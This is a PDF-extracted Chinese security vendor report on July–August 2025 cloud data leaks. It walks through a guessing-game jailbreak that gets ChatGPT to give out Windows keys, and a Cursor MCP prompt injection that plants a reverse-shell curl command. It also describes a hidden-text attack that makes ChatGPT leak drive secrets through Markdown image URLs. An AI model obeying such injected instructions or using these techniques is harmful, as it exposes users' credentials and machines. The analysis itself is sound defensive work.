




版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
全球云上數(shù)據(jù)泄露風險分析報告(第七期)關于綠盟科技綠盟科技集團股份有限公司(以下簡稱綠盟科技),成立于2000年4月,總部位于北京。公司于2014年1月29日起在深圳證券交易所創(chuàng)業(yè)板上市,證券代碼:300369。綠盟科技在國內設有40多個分支機構,為政府、運營商、金融、能源、互聯(lián)網(wǎng)以及教育、醫(yī)療等行業(yè)用戶,提供全線網(wǎng)絡安全產(chǎn)品、全方位安全解決方案和體系化安全運營服務。公司在美國硅谷、日本東京、英國倫敦、新加坡設立海外子公司,深入開展全球業(yè)務,打造全球網(wǎng)絡安全行業(yè)的中國品牌。關于星云實驗室綠盟科技星云實驗室專注于云計算安全、云原生安全、解決方案研究與虛擬化網(wǎng)絡安全問題研究?;贗aaS環(huán)境的安全防護,利用SDN/NFV等新技術和新理念,提出了軟件定義安全的云安全防護體系。承擔并完成多個國家、省、市以及行業(yè)重點單位創(chuàng)新研究課題,已成功孵化落地綠盟科技云安全解決方案、綠盟科技云原生安全解決方案。版權聲明本文中出現(xiàn)的任何文字敘述、文檔格式、插圖、照片、方法、過程等內容,除另有特別注明,版權均屬綠盟科技所有,受到有關產(chǎn)權及版權法保護。任何個人、機構未經(jīng)綠盟科技的書面授權許可,不得以任何方式復制或引用本文的任何片斷。前言01全球7-8月云上數(shù)據(jù)泄露典型事件解讀1事件一.MicrosoftAzure存儲容器配置錯誤導致510萬私人文件泄露7事件二.繞過關鍵詞過濾:ChatGPT泄露Windows產(chǎn)品密鑰10事件三.GitHub泄露600余個APP_KEY導致Laravel應用面臨遠程代碼執(zhí)行風險13事件四.Cursor代碼編輯器曝MCP漏洞,攻擊者可進行RCE和持久化,可能導致敏感信息被竊取風險事件五.ChatGPTGoogleDrive連接器漏洞曝光:0Click操作即可竊取用戶敏感數(shù)據(jù)18事件六.ChatGPT對話內容被公開,超過4500個由用戶創(chuàng)建的“分享鏈接”被公開索引23事件七.GitHub殘留DanglingCommits導致數(shù)千個敏感憑證泄事件八.國外某高校使用的谷歌云盤因開啟文件公開訪問權限導致大規(guī)模學生個人信息泄露28事件九.嚴重0day漏洞被遠程利用,導致數(shù)十臺SharePoint服務器受到威脅,影響數(shù)千家政府機構和私營公司30事件十.配置不當?shù)腅lasticsearch實例導致MagentaTV泄露超過3.24億條用戶日志3402安全建議372.1針對雜項錯誤類的安全建議382.2針對社工類系統(tǒng)入侵的安全建議402.3針對遺失和被盜竊的資產(chǎn)的安全建議4103總結4204參考文獻44全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)期間的全球云上數(shù)據(jù)泄露事件。通過精選并深入分析10起典型案例,從而呈現(xiàn)當前云上通過提示詞誘導AI模型執(zhí)行惡意指令,甚至將敏感信息渲染為圖片以規(guī)避傳統(tǒng)檢測,正Cursor曝出的MCP漏洞,在催生新技術的同時也帶來了新的風險。特別是AI模型與第三方應用的集成,雖然提升了便捷性,但權限配置不當可能導致跨用戶間的敏感信息泄在本期收錄的案例中,有4起與大模型技術密切相關,同時還包括2起云憑證泄露、3起?2025綠盟科技全球7-8月云上數(shù)據(jù)泄露典型事件解讀?2025綠盟科技全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技導致510萬私人文件泄露事件時間:2025年7月泄露規(guī)模:510萬求職者的私人文件事件回顧:2025年7月,Cybernews研究團隊發(fā)現(xiàn)LiveCareer使用的MicrosoftAzure對象存儲存在配置錯誤,導致超過510萬份文件存在泄露風險。LiveCareer是一個成立于2004年為全球數(shù)百萬人提供簡歷模板、求職信生成器和求職工具的平臺。超過1000萬用戶依賴該服務,目前至少有一半的用戶人群可能遭受數(shù)據(jù)泄露的影響。泄露文件中大部分為求職者的簡歷,曝光簡歷跨越多年,時間跨度從2016年到2025年不等。這些簡歷中包含了求職者的姓名、電話號碼、郵箱地址、家庭住址以及完整的職業(yè)經(jīng)歷等個人身份敏感信息。這些個人信息可能會導致被暴露者面臨身份盜用、欺詐、網(wǎng)絡釣魚等風全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技Cybernews研究團隊在2025年3月10日發(fā)現(xiàn)該漏洞,并在同年3月12日初步披露了該風險事件,并多次聯(lián)系LiveCareer,但沒有收到任何回復。最后在同年3月19日聯(lián)系了CERT。事件分析:AzureBlobStorage是一項面向Internet的對象存儲服務,用戶可以借助它在全球范圍內高效地存儲和訪問任意規(guī)模的非結構化數(shù)據(jù),例如文檔、圖片、視頻、日志以及備份文件。AzureBlob提供了多種存儲層級(熱存儲、冷存儲和歸檔存儲),以滿足不同的性能和成本需求,并支持作為數(shù)據(jù)湖的底層存儲服務,為大數(shù)據(jù)分析和機器學習等場景提供支撐。導致此數(shù)據(jù)泄露事件的主要原因是對象存儲服務的權限配置錯誤。1.容器匿名訪問權限配置不當該AzureBlob對象存儲很可能被設置為了“Blob級公開”或“Container級公開”,導致任何人無需認證便可訪問其中的內容。l“Blob公開”:實名者可通過已知URL訪問blob,但無法列出目錄。l“Container公開”:任何人可列出容器中所有文件并訪問它們。2.缺乏最小權限原則與配置審核機制l未堅持“默認私有”策略,反而誤將敏感簡歷文件暴露給互聯(lián)網(wǎng)用戶。l應持續(xù)審查權限配置,但該容器可能多年無人監(jiān)控或審核,導致錯誤長期存在,直到泄露才被發(fā)現(xiàn)。3.缺乏自動檢測和防護手段若啟用了類似MicrosoftDefenderforStorage的服務,可能會識別到存在blob-hunting(掃描暴露的blob)的風險警報,例如:l“可能包含敏感數(shù)據(jù)的容器被公開暴露”l“未經(jīng)身份認證訪問存儲容器”這些報警可以在配置出現(xiàn)異常時及時觸發(fā)并提醒安全團隊進行修復,但該存儲桶顯然沒有開啟這些安全服務。VERIZON事件分類:MiscellaneousErrors(雜項錯誤)所用MITREATT&CK技術:全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技技術子技術利用方式T1610部署對象存儲N/A在部署AzureBlob對象存儲時配置錯誤,將訪問權限設置為公開,導致敏感數(shù)據(jù)暴露。T1593搜索開放網(wǎng)站/域.002搜索引擎攻擊者可能通過網(wǎng)絡空間搜索引擎(如Shodan、FOFA)發(fā)現(xiàn)暴露的AzureBlob存儲容器。T1133外部遠程服務N/A攻擊者識別出互聯(lián)網(wǎng)上暴露的AzureBlob存儲服務。T1587開發(fā)功能.004利用工具攻擊者可利用或開發(fā)自動化工具,對暴露的Blob容器進行批量探測與下載。T1602云存儲中的數(shù)據(jù)N/A攻擊者訪問并獲取AzureBlob容器中存儲的簡歷等敏感數(shù)據(jù)。T1567通過Web服務外泄N/A攻擊者可能通過公開的BlobHTTP(S)接口直接下載或轉存敏感數(shù)據(jù)。T1610部署容器N/A在部署AzureBlob容器時配置錯誤,將訪問權限設置為公開,導致敏感數(shù)據(jù)暴露。T1593搜索開放網(wǎng)站/域.002搜索引擎攻擊者可能通過網(wǎng)絡空間搜索引擎(如Shodan、FOFA)發(fā)現(xiàn)暴露的AzureBlob存儲容器。參考鏈接:/security/livecareer-resume-data-leak/全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技事件二:繞過關鍵詞過濾:ChatGPT泄露Windows產(chǎn)品密鑰泄露規(guī)模:有效的Windows家庭版、專業(yè)版及企業(yè)版的產(chǎn)品密鑰事件回顧:研究人員利用一種精心設計的字謎游戲(本質是提示詞注入),并通過三個階段成功誘導了ChatGPT泄露了本應受保護的Windows產(chǎn)品密鑰。第一階段:制定游戲規(guī)則與偽裝研究人員首先向ChatGPT發(fā)起一個看似無害的請求:玩一個猜謎游戲。他們將攻擊目標Windows產(chǎn)品密鑰偽裝成游戲中的“謎底”。為了繞過AI的內容審查系統(tǒng),攻擊者使用了HTML標簽等技巧來模糊化和分割“Windows10序列號”這樣的敏感關鍵詞,從而成功避開了系統(tǒng)的自動檢測。通過這一步,攻擊者為后續(xù)的敏感信息索取建立了一個安全的、游戲化的上下文環(huán)境。第二階段:請求提示在游戲規(guī)則建立后,研究人員開始按照游戲邏輯向ChatGPT索要“提示”。這些所謂的“提示”實際上就是直接要求提供Windows產(chǎn)品密鑰的指令。由于此時的對話已經(jīng)完全陷入了攻擊?2025綠盟科技者預設的游戲框架內,ChatGPT將這些請求判斷為游戲中的正常步驟,而不是一次違規(guī)的信息索取,因此開始提供相關的密鑰信息作為“提示”。第三階段:觸發(fā)泄露最后,研究人員說出了預設的觸發(fā)短語:“我放棄”。在猜謎游戲的背景下,這句話通常意味著玩家認輸,并希望知道正確答案。ChatGPT遵循了這個邏輯,將完整的、有效的Windows產(chǎn)品密鑰作為“謎底”公布出來,從而完成了信息的最終泄露。事件分析:ChatGPT是由OpenAI開發(fā)的AI聊天機器人,能像真人一樣對話、回答問題、寫作和編程,是目前最受歡迎的智能助手之一。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技此次事件暴露了當前AI內容審核系統(tǒng)在處理上下文信息和執(zhí)行內容限制方面的弱點。攻擊者利用了AI模型對關鍵詞過濾的依賴,通過社會工程學技巧繞過了安全措施。這表明,需要更強大的、能夠理解上下文的、多層次的防御機制來抵御此類攻擊。VERIZON事件分類:SocialEngineering(社工)所用MITREATT&CK技術:技術子技術利用方式T1598針對信息的網(wǎng)絡釣魚N/A攻擊者可能通過提示詞注入引誘大模型輸出敏感信息T1587開發(fā)功能.004利用工具攻擊者開發(fā)針對敏感信息服務進行利用的工具,以便拿到windows序列號后,進行合法密鑰打包到盜版激活工具中,供他人非法使用,并將這些序列號發(fā)送至云存儲中進行存儲T1530云存儲中的數(shù)據(jù)N/A攻擊者訪問云存儲服務中的windows序列號,以便利用工具去牟利T1598針對信息的網(wǎng)絡釣魚N/A攻擊者可能通過提示詞注入引誘大模型輸出敏感信息T1587開發(fā)功能.004利用工具攻擊者開發(fā)針對敏感信息服務進行利用的工具,以便拿到windows序列號后,進行合法密鑰打包到盜版激活工具中,供他人非法使用,并將這些序列號發(fā)送至云存儲中進行存儲T1530云存儲中的數(shù)據(jù)N/A攻擊者訪問云存儲服務中的windows序列號,以便利用工具去牟利參考鏈接:/s/RgPlKabdKNnUjVWIBVOKUw全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技致Laravel應用面臨遠程代碼執(zhí)行風險泄露規(guī)模:600余個LaravelAPP_KEY,以及Laravel.ENV中包含的云存儲令牌、數(shù)據(jù)庫憑證、電商平臺、客服工具及AI服務相關密鑰事件回顧:2018年:CVE-2018-15133漏洞曝光,Laravel5.6.30之前版本存在反序列化漏洞(CVE-2018-15133攻擊者可通過泄露的APP_KEY偽造惡意Cookie或會話數(shù)據(jù),從而繞過身份驗證。2022年:AndroxGh0st惡意軟件利用該漏洞,黑客組織利用自動化工具在互聯(lián)網(wǎng)上掃描配置不當?shù)腖aravel應用程序,從而竊取.env文件中的APP_KEY,并針對CVE-2018-15133漏洞進行在野利用。2022年—2025年5月:大規(guī)模APP_KEY泄露被發(fā)現(xiàn),安全公司GitGuardian與Synacktiv合作研究發(fā)現(xiàn),超過26萬個LaravelAPP_KEY被泄露。2025年7月12日:研究報告公開,GitGuardian與Synacktiv正式公布研究結果,確認超過600個Laravel應用程序因APP_KEY泄露而面臨嚴重的遠程代碼執(zhí)行(RCE)風險。事件分析:APP_KEY是一個隨機的32字節(jié)加密密鑰,是在Laravel安裝過程中生成的并存儲在應用程序的.env文件中,主要用于加密和解密數(shù)據(jù),并創(chuàng)建唯一的身份驗證令牌。如果該全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技APP_KEY泄露,攻擊者可能利用CVE-2018-15133反序列化漏洞偽造惡意Cookie或會話數(shù)據(jù),繞過身份驗證。導致此次事件的根因有兩個:憑證泄露:開發(fā)人員由于配置錯誤將包含敏感信息(APP_KEY)的.env環(huán)境配置文件錯誤地提交到了公開的GitHub代碼倉庫中導致外泄。Laravel框架NDay漏洞利用:Laravel框架在實現(xiàn)decrypt()解密功能時存在一個嚴重的安全問題CVE-2018-15133,會自動對解密后的數(shù)據(jù)(APP_KEY)進行反序列化操作,導致攻擊者可對應用進行RCE。攻擊者一旦獲取到泄露的APP_KEY,就可以精心構造一個惡意的加密數(shù)據(jù)。當Laravel應用程序的decrypt()函數(shù)處理這個惡意數(shù)據(jù)時,自動的反序列化過程會觸發(fā)服務器上的任意代碼執(zhí)行(RemoteCodeExecution,RCE),從而導致服務器被完全控制。研究表明,即使在較新的Laravel版本中,如果開發(fā)者將Session驅動配置為使用Cookie,這個攻擊向量依然存在,因為攻擊者可以利用CVE-2024-55556漏洞在Laravel的反序列化入口點注入惡意載荷,并最終成功執(zhí)行任意代碼。該攻擊路徑如下所示:VERIZON事件分類:MiscellaneousErrors(雜項類錯誤)所用MITREATT&CK技術:技術子技術利用方式T1595主動掃描.002漏洞掃描攻擊者通過Laravel配置錯誤對暴露的.ENV文件進行獲取,該文件中包含APP_KEY以及系統(tǒng)配置信息T1587開發(fā)功能.001惡意軟件攻擊者開發(fā)惡意代碼,主要用于將泄露的APP_KEY存放至云存儲或網(wǎng)盤中T1530云存儲中的數(shù)據(jù)N/A攻擊者收藏并訪問云存儲服務中的LaravelAPP_KEYT1041通過C2通道外泄N/A攻擊者通過在現(xiàn)有命令和控制通道中竊取數(shù)據(jù)。竊取的數(shù)據(jù)利用與命令和控制通信相同的協(xié)議在正常通信通道中進行編碼。本示例主要用于利用CVE-2018-15133漏洞從而繞過身份驗證進行遠程代碼執(zhí)行參考鏈接:https://hackernews.cc/archives/58342/blog/news/2025/04/hertz-data-breach-caused-by-cl0p-ransomware-attack-on-vendor?2025綠盟科技事件時間:2025年7月泄露規(guī)模:未報告具體的數(shù)據(jù)泄露數(shù)字,潛在危害較大,漏洞允許攻擊者在開發(fā)者設備上實現(xiàn)RCE、可能泄露源碼、API秘鑰、云服務憑證風險。事件回顧:該事件圍繞CursorIDE中的兩個關鍵漏洞CVE-2025-54135和CVE-2025-54136展開。攻擊者利用了Cursor實現(xiàn)模型上下文協(xié)議(MCP)功能時的信任和驗證缺陷。通過“提示注入”或“信任濫用”兩種方式,攻擊者可以誘騙或繞過安全機制,在用戶不知情的情況下,讓CursorIDE執(zhí)行任意預設的惡意命令,從而完全控制開發(fā)者的設備。Cursor團隊在收到報告后迅速發(fā)布了修復補丁。該漏洞的影響范圍為所有使用低于1.3.9版本的CursorIDE用戶均受此漏洞威脅。事件分析:前置概念:模型上下文協(xié)議(MCP)與.cursor/mcp.json,在分析漏洞之前,必須先理解這兩個核心概念:l模型上下文協(xié)議(ModelContextProtocol,MCP):CursorIDE內置的一個功能框架,主要充當大語言模型與本地開發(fā)環(huán)境之間的“橋梁”。MCP允許AI不再僅僅是代碼生成器,而是可以調用外部工具(如數(shù)據(jù)庫客戶端、API測試工具、本地腳本)的“智能代理”。通過MCP,AI可以執(zhí)行被預先定義好的命令,從而完成更復雜的任務,例如直接查詢數(shù)據(jù)庫、運行測試套件等。l.cursor/mcp.json文件:CursorIDEMCP的配置文件。開發(fā)者可以在項目根目錄下的.cursor文件夾內創(chuàng)建mcp.json文件,用于定義一系列可供AI調用的命令。每個命令都有一個名稱和對應的、將在本地終端執(zhí)行的實際指令。CursorIDE在啟動時會自動掃描并加載這些配置,讓AI知道有哪些工具可用。經(jīng)過分析CVE-2025-54135和CVE-2025-54136漏洞的利用方式后不難看出具體利用點以及攻擊路徑全貌和最終的根因,如下所示:CVE-2025-54135(CurXecute):提示注入到遠程代碼執(zhí)行?2025綠盟科技利用點:Cursor的實現(xiàn)邏輯存在一個致命缺陷:“創(chuàng)建”一個新的.cursor/mcp.json文件無需用戶批準,而“編輯”一個已存在的文件則需要。原理與攻擊路徑:攻擊者在一個公開的文檔(如GitHub的README文件、共享文檔)中植入一段精心構造的惡意文本,即“間接提示注入(IndirectPromptInjection)”。這個提示會指示AI創(chuàng)建一個文件。受害者要求Cursor的AI代理讀取或總結這份被污染的文檔。AI被惡意提示劫持,遵循其指令,在當前項目工作區(qū)內創(chuàng)建了一個新的.cursor/mcp.json文件,并將攻擊者的惡意命令(如反向Shellcurl/revshell|sh)寫入其中。由于“創(chuàng)建”行為無需審批,這個惡意文件被Cursor默默創(chuàng)建并立即加載執(zhí)行,導致遠程代碼執(zhí)行(RCE)。CVE-2025-54136(MCPoison):信任濫用與后門持久化利用點:Cursor的信任機制是一次性且基于名稱的。一旦用戶批準了某個名稱的MCP配置,Cursor就會永久信任該名稱,即使其對應的命令后續(xù)被修改,也不會再次請求用戶批準。原理與攻擊路徑:攻擊者在共享代碼庫(如Github)中提交一個包含良性mcp.json文件的PR。例如,里面只包含一條無害的echo"hello"命令。團隊中的其他開發(fā)者(受害者)拉取代碼,首次在Cursor中打開項目。Cursor彈窗請求批準這個無害的配置,用戶看到命令無害,便點擊“批準”。攻擊者提交新的代碼,將那個已被批準的mcp.json文件中的echo"hello"命令靜默地修改為惡意命令。當受害者下一次同步代碼并打開Cursor時,IDE會自動加載這個已被篡改但仍被“信任”的配置,直接在后臺執(zhí)行惡意命令,無需任何用戶交互。這為攻擊者提供了一個極其隱蔽的持久化后門。以上內容我們可以看出導致此次事件的根本原因在于CursorIDE對mcp.json配置文件的管理和執(zhí)行機制存在嚴重的安全設計缺陷。CursorIDE過度信任了來自AI和項目文件的內容,而沒有對關鍵的安全步驟進行充分驗證。VERIZON事件分類:SystemIntrusion(系統(tǒng)入侵)所用MITREATT&CK技術:全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技技術子技術利用方式T1195網(wǎng)絡釣魚.001攻擊者通過向公共代碼庫中注入惡意配置文件來感染下游開發(fā)者。T1059有效賬戶N/A攻擊者可在用戶的終端上執(zhí)行任意命令和腳本。T1137惡意宏N/Amcp.json在Cursor(應用程序)啟動時自動加載并執(zhí)行,實現(xiàn)了持久化后門(尤其在CVE-2025-54136中)T1202間接命令執(zhí)行N/ACursorIDE作為代理間接執(zhí)行了攻擊者預設的命令。T1592受害者信息收集N/A成功執(zhí)行代碼后,攻擊者可以運行命令來收集關于受害者主機和網(wǎng)絡環(huán)境的信息。參考鏈接:/s/82TlaLYc8q98sEbvLZ_wSg/prompt-injection-to-code-execution-cursor-code-editor-hit-by-critical-mcp-vulnerabilities-cve-2025-54135-cve-2025-54136/全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技事件五:ChatGPTGoogleDrive連接器漏洞曝光:0Click操作即可竊取用戶敏感數(shù)據(jù)事件時間:2025年8月泄露規(guī)模:此次攻擊可導致連接到ChatGPT的第三方應用(如GoogleDrive,SharePoint,GitHub等)中的敏感數(shù)據(jù)泄露。具體泄露的信息類型包括但不限于:API密鑰和訪問令牌、登錄憑證、存儲在云服務中的機密商業(yè)文件或個人數(shù)據(jù),攻擊的潛在影響范圍是所有啟用了ChatGPT連接器功能,并用其處理來自不可信來源文件的用戶。事件回顧:攻擊準備:攻擊者創(chuàng)建一個包含惡意指令的文檔。這些指令通常使用極小或白色的字體隱藏起來,肉眼難以察覺。社工:攻擊者通過GoogleDrive、SharePoint或電子郵件等方式,將這個惡意指令的文檔分享給目標受害者。用戶觸發(fā):受害者看到這個分享來的新文件后,可能會向其集成了GoogleDrive等服務的ChatGPT助手發(fā)出一個看似無害的請求,例如:“總結一下這個剛分享給我的文檔”。攻擊執(zhí)行:ChatGPT在執(zhí)行總結任務時,會讀取該文檔。文檔中隱藏的惡意指令被AI執(zhí)行,它會覆蓋用戶原本的總結任務。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技數(shù)據(jù)竊?。簮阂庵噶顣頒hatGPT在受害者連接的云盤中搜索其他文件,尋找如APIKey、Password等關鍵詞的敏感信息。數(shù)據(jù)外泄:一旦找到敏感數(shù)據(jù),惡意指令會利用特定的機制將數(shù)據(jù)外泄。整個過程無需受害者進行任何額外點擊,在后臺自動完成。漏洞披露:2025年8月6日,Zenity團隊公開披露了該漏洞的完整細節(jié)。事件分析:2025年5月,OpenAI發(fā)布了ChatGPT連接器,該功能允許ChatGPT從GoogleDSharepoint文檔中讀入內容全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技通過連接器這一功能雖然方便用戶可以免登錄第三方應用,但由于三方應用中可能也會存放敏感信息,因此存在通過提示詞注入的方式竊取敏感信息的風險,該事件的根本原因在于AI模型目前難以嚴格區(qū)分用戶的良性指令和嵌入在被處理數(shù)據(jù)中的惡意指令。當ChatGPT處理來自外部的、不受信任的文檔時,它會將文檔中隱藏的指令與用戶的正常指令同等對待,從而導致被惡意操控。該事件的攻擊路徑核心并非是受害者自己創(chuàng)建惡意文件,而是處理了由攻擊者分享來的惡意文件。受害者的ChatGPT連接了其私人的GoogleDrive,當它奉命讀取攻擊者分享的惡意文件時,惡意指令就被激活,從而使AI“倒戈”,開始掃描受害者自己的云盤中的其他文件,竊取數(shù)據(jù)。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技本次事件中,攻擊者還有效使用了繞過安全檢測的方法,因為最終回傳敏感信息到攻擊者服務器時,通常面臨安全策略的檢測,因此攻擊者的策略是使用ChatGPT的Markdown渲染功能來實現(xiàn)數(shù)據(jù)外泄,從而繞過了OpenAI對直接訪問惡意URL的封鎖。具體方法可簡單描當惡意指令竊取到敏感數(shù)據(jù),如API密鑰后,惡意指令不會嘗試生成一個指向的鏈接,因為這會被安全策略阻止。取而代之,指令會命令ChatGPT生成一段Markdown文本,并請求將其渲染成一張圖片。例如,指令會是以下方式:的Markdown單ChatGPT為了渲染這張圖片,會向URL中的發(fā)起一個合法的請求。這個域名本身是可信的(可能是OpenAI自身或其云服務商Azure的Blob存儲服務),因此可以通過URL過濾器的檢測。然而,竊取到的敏感數(shù)據(jù)會作為參數(shù)(?data=...)被附加在該合法請求的URL中。攻擊者只需監(jiān)控其能控制的、或能夠公開訪問日志的渲染服務端點,就能從請求日志中捕獲這些參數(shù),從而完成數(shù)據(jù)竊取。VERIZON事件分類:SocialEngineering(社工)所用MITREATT&CK技術:全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技技術子技術利用方式T1566釣魚攻擊N/A攻擊者通過云服務,如GoogleDrive,將一個包含惡意指令的“有毒”文檔分享給受害者T1059命令和腳本解釋器N/AChatGPT本身扮演了“解釋器”的角色,而隱藏在文檔中的惡意提示則充當了“腳本”。當ChatGPT處理該文檔時,并非在執(zhí)行傳統(tǒng)的Shell命令或PowerShell腳本,而是在解釋并執(zhí)行惡意提示所描述的指令T1204用戶執(zhí)行N/A受害者要求ChatGPT去處理被分享的惡意文件T1027混淆文件或信息N/A攻擊者通過將惡意指令設置為1像素的白色字體,將其隱藏在文檔的白色背景中,使得普通用戶無法直接察覺T1567通過Web服務進行數(shù)據(jù)滲漏N/A攻擊者為了繞過OpenAI可能存在的惡意URL過濾器,沒有直接將數(shù)據(jù)發(fā)送到攻擊者控制的服務器。而是巧妙地利用了ChatGPT的Markdown圖片渲染功能,將竊取的數(shù)據(jù)編碼后作為參數(shù),附加到一個合法的、受信任的Web服務,如AzureBlobStorage或其他圖片渲染服務的URL中T1083通過Web服務進行數(shù)據(jù)滲漏N/A惡意指令被執(zhí)行后,會命令ChatGPT在受害者連接的云存儲,如GoogleDrive中進行搜索,尋找其他文件。T1552文件中的憑證.001搜索包含特定關鍵詞,如APIkey,password,secret的文件T1530云存儲對象的數(shù)據(jù)N/A一旦發(fā)現(xiàn)包含敏感信息的目標文件,惡意指令會驅使ChatGPT讀取這些文件內容,并提取出具體的敏感數(shù)據(jù)T1567滲漏到云存儲.002竊取到的數(shù)據(jù)被編碼進一個URL參數(shù)中,并通過ChatGPT對一個外部云服務的合法API調用被發(fā)送出去。攻擊者隨后可以從該服務的訪問日志中提取出這些數(shù)據(jù),完成最終的滲漏參考鏈接:/en/articles/9309188-add-files-from-connected-apps-in-chatgpt/tamirishaysh/status/1953534127879102507/articles/81932https://labs.zenity.io/p/agentflayer-chatgpt-connectors-0click-attack-5b41全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技事件六:ChatGPT對話內容被公開,超過4500個由用戶創(chuàng)建的“分享鏈接”被公開索事件時間:2025年8月泄露規(guī)模:超過4500個由用戶創(chuàng)建的ChatGPT“分享鏈接”被公開索引,泄露的信息種類繁多,包含大量敏感內容,例如個人身份信息、私密個人對話、商業(yè)機密信息包含企業(yè)內部戰(zhàn)略討論、項目計劃、代碼片段、API密鑰以及客戶數(shù)據(jù)等。事件回顧:2025年7月,OpenAI在其ChatGPT中推出“分享鏈接”功能,并附帶一個“讓此聊天可被發(fā)現(xiàn)”的選項,這是一個短暫的實驗性功能。該功能旨在方便用戶與他人分享對話內容同月,分享鏈接功能風險暴露:當用戶勾選“可被發(fā)現(xiàn)”選項后,生成的分享鏈接頁面并沒有被設置為禁止搜索引擎抓取(缺少noindex標簽)。這導致谷歌等搜索引擎將這些本應是半私密的分享鏈接當作普通網(wǎng)頁進行抓取和索引。2025年7月下旬:媒體發(fā)現(xiàn),通過在谷歌使用特定的GoogleHacking指令,例如site:/share,可以輕易地搜索到大量用戶的ChatGPT對話內容。這一發(fā)現(xiàn)引發(fā)了用戶對隱私安全的普遍擔憂。2025年8月初:在事件曝光并引發(fā)廣泛批評后,OpenAI迅速采取行動,移除了“讓此聊天可被發(fā)現(xiàn)”的功能。公司表示正在與谷歌等搜索引擎合作,從搜索結果中移除已經(jīng)被索引的對話鏈接。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技盡管OpenAI采取了補救措施,但由于搜索引擎緩存機制的存在,部分已泄露的對話內容在被移除后的一段時間內可能仍然可見。即使用戶在ChatGPT中刪除了原始對話,已經(jīng)生成的分享鏈接也需要單獨在設置中進行管理和刪除。事件分析:此次泄露事件的根源在于ChatGPT設計缺陷、用戶認知不足兩方面原因:首先技術層面的根因最核心的技術缺陷是被設置為“可發(fā)現(xiàn)”的分享頁面缺少“noindex”元標簽。該標簽是網(wǎng)站向搜索引擎?zhèn)鬟_“請勿索引此頁面”的標準指令。由于缺少這一防護,一旦分享鏈接被發(fā)布在任何公共可達的地方,就會被搜索引擎抓取。其次是功能本身缺乏訪問控制,“分享鏈接”功能本身缺少精細的權限管理機制,任何獲得鏈接的人都可以訪問其內容,無法限制訪問范圍或追蹤訪問者最后是產(chǎn)品設計與用戶引導不足,OpenAI在設計此功能時,盡管提供了“可被發(fā)現(xiàn)”的選項,但并未以足夠清晰和醒目的方式警告用戶,勾選此項意味著對話將被公之于眾并可能被任何人搜索到。從而導致許多用戶誤以為這只是一個方便分享給特定接收者的私密鏈接。VERIZON事件分類:MiscellaneousErrors(雜項錯誤)所用MITREATT&CK技術:技術子技術利用方式T1593搜索開放網(wǎng)站/域.002搜索引擎由于OpenAI的設計缺陷,大量包含敏感信息的ChatGPT對話變成了“公開可訪問信息”。攻擊者無需攻破任何系統(tǒng),只需利用搜索引擎這類公開工具,就能輕易地發(fā)現(xiàn)和收集這些寶貴的情報,用于后續(xù)的釣魚攻擊、身份盜竊或商業(yè)間諜活動。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技致數(shù)千個敏感憑證泄露事件時間:2025年7月泄露規(guī)模:數(shù)千個活躍的泄露憑證,包括MongoDB、TelegramBotToken、Postgres、AWS等162種不同類型的憑證,其中MongoDB憑證泄露數(shù)據(jù)最多,高達1247條。事件回顧:安全研究員發(fā)現(xiàn)Git歷史中的commit即使被刪除(如通過forcepush),GitHub仍保留這些“懸空提交”(danglingcommits,是指存在于Git倉庫對象數(shù)據(jù).git/objects中但沒有被任何分支、標簽或其他引用指向的commit對象)。白帽黑客SharonBrizinov設計了一種通過掃描DanglingCommits來尋找敏感信息的方法,他掃描了從2020年以來的所有ForcePushEvent,并利用一個AI生成的掃描工具“vibe-coded”發(fā)現(xiàn)了數(shù)千個活躍的憑證。其中MongoDB憑證達1247條,數(shù)量最多,還發(fā)現(xiàn)數(shù)百條TelegramBotToken、Postgres、和AWS憑證,共涉及162種不同類型的憑證。泄露的信息多數(shù)存在于.env文件中(超過50%其余散布于index.js、perties、app.js、server.js等文件中風險最大的是GitHubPAT和AWS憑證,一旦泄露,可能導致環(huán)境被完全控制。其中一個是GitHubPAT令牌,可以獲取Istio(Istio項目廣泛用于管理和保護微服務,潛在的供應全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技鏈妥協(xié)可能會影響谷歌、IBM、RedHat等大公司)的所有存儲庫的訪問權限。Sharon表示,通過PAT可以讀取環(huán)境變量、修改CI/CD流程、推送代碼、發(fā)布版本,甚至刪除整個項目帶來嚴重的供應鏈風險。事件分析:此次事件的根源在于代碼倉庫的歷史與敏感信息未得到有效治理。開發(fā)者在日常開發(f